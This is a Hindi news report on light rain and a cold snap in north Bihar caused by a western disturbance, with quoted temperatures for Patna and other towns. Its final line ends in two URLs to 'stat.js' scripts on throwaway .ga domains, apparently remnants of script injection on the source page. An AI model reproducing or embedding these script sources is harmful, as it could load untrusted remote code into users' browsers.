उत्तरी बिहार के कई जिलों में हल्की बारिश होने के कारण मौसम में एकदम से बदलाव आ गया है। यह बदलाव हिमालय के पश्चिमी भाग में विक्षोभ बनने के कारण आया है। उत्तरी बिहार के कई हिस्सों में हल्की बारिश हुई हल्की बारिश होने के कारण ठंड बढ़ गई है और अगले 24 घंटों तक यह स्थिति बनी रहने की उम्मीद है। मंगलवार के बाद राज्य के मौसम में सुधार होने की उम्मीद है।
पटना मौसम विज्ञान केंद्र के वरिष्ठ विज्ञानी संजय कुमार का कहना है कि मौसम में व्यापक बदलाव आया है। पश्चिमी विक्षोभ के कारण पूर्वी चंपारण, सारण, सिवान, गोपालगंज, सीतामढ़ी एवं शिवहर में हल्की बारिश हुई है। बारिश होने के कारण प्रदेश में काफी ठंडी हवा चलनी शुरू हो गई जिसके कारण ठंड बढ़ गई और रात 8:00 बजे से ही सड़कों पर सन्नाटा छाने लगा।
सूर्यास्त के बाद तापमान एकदम से नीचे गिर गया सभी 8:00 बजे के पहले अपने घर पहुंच कर खिड़की दरवाजे बंद करके अपने घर पहुंच गए। राज्य में अधिकतम तापमान फारबिसगंज में 33.2 डिग्री सेल्सियस और न्यूनतम तापमान 14 डिग्री सेल्सियस रिकॉर्ड किया गया है। राजधानी में अधिकतम तापमान सोमवार को 5 डिग्री सेल्सियस का गिरावट दर्ज किया गया। अधिकतम तापमान 26.8 और न्यूनतम तापमान 16.4 डिग्री सेल्सियस रिकॉर्ड किया गया है।
रविवार को अधिकतम तापमान 31.8 और न्यूनतम तापमान 17.3 डिग्री सेल्सियस तक रिकॉर्ड किया गया है। राजधानी की हवा में आद्रता 90 फसीद तक पहुंच गई है। परंतु आज पटना में अच्छी धूप खिली है। आकाश भी लगभग साफ दिख रहा है जिसको देखते हुए मौसम साफ होने की उम्मीद बताई जा रही है। परंतु सुबह के दिनों में ठंड पिछले दिनों की अपेक्षा अधिक महसूस की गई है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms